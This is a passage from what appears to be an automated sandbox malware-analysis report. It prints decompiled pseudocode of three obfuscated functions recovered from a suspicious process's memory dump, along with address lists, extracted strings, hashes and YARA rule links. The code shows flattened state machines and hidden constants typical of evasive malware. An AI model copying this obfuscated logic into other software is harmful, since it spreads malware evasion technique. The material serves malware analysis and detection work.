				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0024AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0023B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00244F7D(_v632, _v628, _t324); // executed
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0023F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0024889D(0x24c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x24ca2c; // 0x5d8300
												_t224 = _t321 + 0x230; // 0x7a0056
												E0023C680(_t224, _v648, _v608, _t303, _v636,  *0x24ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00242025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0023B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00243895
0x0024389b
0x002438a5
0x002438ad
0x002438b2
0x002438bd
0x002438c5
0x002438ca
0x002438d2
0x002438d7
0x002438df
0x002438e7
0x002438ef
0x002438f7
0x002438ff
0x00243907
0x0024390f
0x0024391e
0x00243922
0x00243924
0x00243933
0x00243934
0x00243938
0x00243940
0x00243948
0x00243950
0x00243958
0x0024395d
0x00243965
0x0024396d
0x00243975
0x0024397d
0x00243985
0x0024398d
0x00243995
0x0024399a
0x002439a2
0x002439b0
0x002439b4
0x002439bc
0x002439c4
0x002439d1
0x002439d5
0x002439da
0x002439e2
0x002439ef
0x002439f3
0x002439f7
0x002439ff
0x00243a07
0x00243a0f
0x00243a17
0x00243a1f
0x00243a27
0x00243a2f
0x00243a37
0x00243a3f
0x00243a44
0x00243a49
0x00243a51
0x00243a59
0x00243a5e
0x00243a66
0x00243a6e
0x00243a76
0x00243a7e
0x00243a86
0x00243a8e
0x00243a96
0x00243a9e
0x00243aac
0x00243ab4
0x00243ab8
0x00243ac0
0x00243ac8
0x00243ad0
0x00243ad8
0x00243ae0
0x00243ae8
0x00243af0
0x00243af8
0x00243b00
0x00243b08
0x00243b18
0x00243b21
0x00243b24
0x00243b28
0x00243b30
0x00243b38
0x00243b45
0x00243b4e
0x00243b52
0x00243b5a
0x00243b6a
0x00243b6e
0x00243b76
0x00243b7e
0x00243b83
0x00243b8b
0x00243b90
0x00243b98
0x00243ba0
0x00243ba5
0x00243bad
0x00243bb5
0x00243bba
0x00243bc2
0x00243bca
0x00243bd2
0x00243bd7
0x00243bdc
0x00243be4
0x00243bec
0x00243bf1
0x00243bf9
0x00243c01
0x00243c0d
0x00243c10
0x00243c14
0x00243c1c
0x00243c20
0x00243c28
0x00243c30
0x00243c38
0x00243c38
0x00243c4a
0x00243db7
0x00000000
0x00243c50
0x00243c52
0x00243da5
0x00243daa
0x00243dad
0x00000000
0x00243c58
0x00243c5e
0x00243d0c
0x00243d17
0x00243d1e
0x00243d26
0x00243d2d
0x00243d34
0x00243d3b
0x00243d57
0x00243d5e
0x00243d65
0x00243d6c
0x00243d73
0x00243d7a
0x00243d7e
0x00243d80
0x00243d83
0x00000000
0x00243c64
0x00243c6a
0x00243e2c
0x00243c70
0x00243c76
0x00243cf4
0x00243cfb
0x00243d00
0x00000000
0x00243c78
0x00243c78
0x00243c7e
0x00000000
0x00243c84
0x00243c84
0x00243c91
0x00243c96
0x00243cb8
0x00243cc2
0x00243cc8
0x00243ccd
0x00243cde
0x00243ce5
0x00000000
0x00243ce5
0x00243c7e
0x00243c76
0x00243c6a
0x00243c5e
0x00243c52
0x00243e35
0x00243e3e
0x00243e3e
0x00243df7
0x00243dfc
0x00243dfe
0x00243e01
0x00243e04
0x00243e10
0x00000000
0x00243e06
0x00243e06
0x00000000
0x00243e06
0x00000000
0x00243e15
0x00243e15
0x00243e15
0x00000000

Strings

d&, xrefs: 00243950
jy, xrefs: 00243965
y#, xrefs: 00243BBA
ontext returned - (%14) Credential Handle(%2:%3) Context Handle (%4:%5) (OutputFlags %11) (Buffer %8 [%9/%10]) (DataChunk %12 [%13, xrefs: 00243C38, 00243CE5
:{M/, xrefs: 00243DAD
6j, xrefs: 002438CA
$, xrefs: 002439FF
:{M/, xrefs: 00243C70
/w, xrefs: 002438DF
-(, xrefs: 002439DA
WU, xrefs: 00243B6E

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$ontext returned - (%14) Credential Handle(%2:%3) Context Handle (%4:%5) (OutputFlags %11) (Buffer %8 [%9/%10]) (DataChunk %12 [%13$y#$$
API String ID: 2962429428-2735796983
Opcode ID: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
Instruction ID: 952bdb02c812a16a9a321b22c93aee58147aeeb9372d14efb3e83a78715db55e
Opcode Fuzzy Hash: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
Instruction Fuzzy Hash: 0BD101715183819FE368CF25C489A5BFBE1BBC4358F108A1DF1D9862A0D7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002442DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002442DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0024A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00248C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002494DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00235FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0023F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0023F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00238736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00238736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0023F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00247830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x002442da
0x002442e4
0x002442eb
0x002442ef
0x002442f6
0x002442fd
0x00244304
0x00244305
0x00244306
0x0024430b
0x00244316
0x00244319
0x00244323
0x0024432e
0x00244330
0x00244338
0x0024433d
0x00244342
0x00244344
0x00244348
0x0024434d
0x00244355
0x0024435d
0x00244365
0x0024436a
0x00244372
0x0024437d
0x00244388
0x00244393
0x0024439b
0x002443a0
0x002443a8
0x002443b0
0x002443b8
0x002443c3
0x002443cb
0x002443d6
0x002443de
0x002443ed
0x002443f0
0x002443f4
0x002443fc
0x00244404
0x00244409
0x00244411
0x00244419
0x00244421
0x00244429
0x0024442e
0x00244433
0x0024443b
0x00244443
0x0024444b
0x00244453
0x0024445b
0x00244463
0x0024446e
0x00244479
0x00244484
0x00244494
0x0024449c
0x0024449f
0x002444a3
0x002444ab
0x002444b3
0x002444bb
0x002444c3
0x002444cb
0x002444d6
0x002444e1
0x002444ee
0x002444fd
0x00244500
0x00244504
0x0024450c
0x00244514
0x0024451c
0x00244524
0x0024452c
0x00244534
0x00244541
0x00244545
0x0024454d
0x00244555
0x00244568
0x0024456f
0x0024457a
0x00244582
0x00244587
0x0024458f
0x00244597
0x0024459f
0x002445af
0x002445b3
0x002445b8
0x002445c0
0x002445c8
0x002445d4
0x002445d9
0x002445df
0x002445e7
0x002445f4
0x002445f5
0x002445f9
0x00244601
0x00244609
0x00244611
0x00244616
0x0024461e
0x00244629
0x00244634
0x0024463f
0x00244647
0x0024464f
0x00244657
0x0024465f
0x00244667
0x0024466f
0x00244674
0x0024467c
0x0024468a
0x0024468e
0x00244696
0x0024469b
0x002446a3
0x002446ab
0x002446b3
0x002446bb
0x002446c3
0x002446cb
0x002446d0
0x002446d8
0x002446e0
0x002446f0
0x002446f5
0x002446fe
0x00244709
0x00244714
0x0024471f
0x0024472a
0x00244735
0x0024473d
0x00244748
0x00244750
0x00244758
0x0024475d
0x00244765
0x0024476d
0x00244778
0x00244780
0x0024478b
0x00244793
0x0024479b
0x002447a3
0x002447ab
0x002447b3
0x002447be
0x002447c9
0x002447d4
0x002447e0
0x002447e3
0x002447e7
0x002447ef
0x002447f6
0x002447fa
0x002447fa
0x002447ff
0x002447ff
0x00244805
0x00000000
0x00000000
0x0024480b
0x0024480b
0x00244939
0x0024494b
0x00244950
0x00244955
0x002449e0
0x002449e0
0x00000000
0x0024495b
0x00244966
0x0024496e
0x00244980
0x00244984
0x00244988
0x00000000
0x00244988
0x00000000
0x00244811
0x00244813
0x002448d7
0x002448fa
0x002448fd
0x00244902
0x00244a70
0x00244a70
0x00244a74
0x00000000
0x00244819
0x0024481f
0x002448a2
0x002448a9
0x00000000
0x00244821
0x00244827
0x00000000
0x00244aa3
0x00244833
0x00244877
0x0024487c
0x00244884
0x00000000
0x00244835
0x0024483b
0x00244a79
0x00244a7f
0x00244a81
0x002447ff
0x002447ff
0x00244805
0x00000000
0x00000000
0x00000000
0x00244805
0x00000000
0x002447ff
0x00244841
0x00244850
0x00244851
0x00244857
0x0024485c
0x00244862
0x00244868
0x0024486d
0x0024486d
0x00244871
0x00244871
0x00000000
0x00244871
0x00244862
0x0024483b
0x00244833
0x0024481f
0x00244813
0x00244aae
0x00244aae
0x00000000
0x00244990
0x00244996
0x00244a4d
0x00244a4e
0x00244a54
0x00244a59
0x00244a5f
0x00244a6b
0x00000000
0x00244a61
0x00244a61
0x00000000
0x00244a61
0x0024499c
0x002449a2
0x00244a10
0x00244a15
0x00244a19
0x00244a1e
0x00244a25
0x00244a2e
0x00244a33
0x00000000
0x002449a4
0x002449aa
0x002449d8
0x002449dd
0x00000000
0x002449ac
0x002449b2
0x00000000
0x002449b8
0x002449b8
0x00000000
0x002449b8
0x002449b2
0x002449aa
0x002449a2
0x00000000
0x00244996
0x002447ff

Strings

dEH, xrefs: 0024473D
+^, xrefs: 00244463
RESCDIR, xrefs: 00244852
l), xrefs: 00244355
R.93, xrefs: 002449A4
R.93, xrefs: 002448F0

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction ID: 2915dc4c776e2eeafc5de5578439d751d9c85e9b08d4b9fb612639cca2ca5e31
Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction Fuzzy Hash: 980242725187819FE3A8DF24C88AA5BFBE1FBC4314F108A1DE5D996260D7B48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002402C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002402C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0023F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0024AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0023B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00243E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00237F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00244F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x002402c3
0x002402c9
0x002402d3
0x002402db
0x002402e9
0x002402ea
0x002402ec
0x002402f1
0x002402f5
0x00240305
0x0024030b
0x00240313
0x0024031b
0x00240323
0x00240328
0x00240334
0x00240339
0x0024033f
0x00240347
0x0024034f
0x00240354
0x00240360
0x00240365
0x0024036b
0x00240373
0x0024037f
0x00240384
0x0024038a
0x00240392
0x0024039a
0x002403a3
0x002403a8
0x002403ae
0x002403b6
0x002403be
0x002403c6
0x002403ce
0x002403d6
0x002403de
0x002403e3
0x002403ef
0x002403f2
0x002403f6
0x002403fe
0x00240406
0x0024040b
0x00240413
0x0024041b
0x00240420
0x00240428
0x00240430
0x00240438
0x00240440
0x00240448
0x00240459
0x00240461
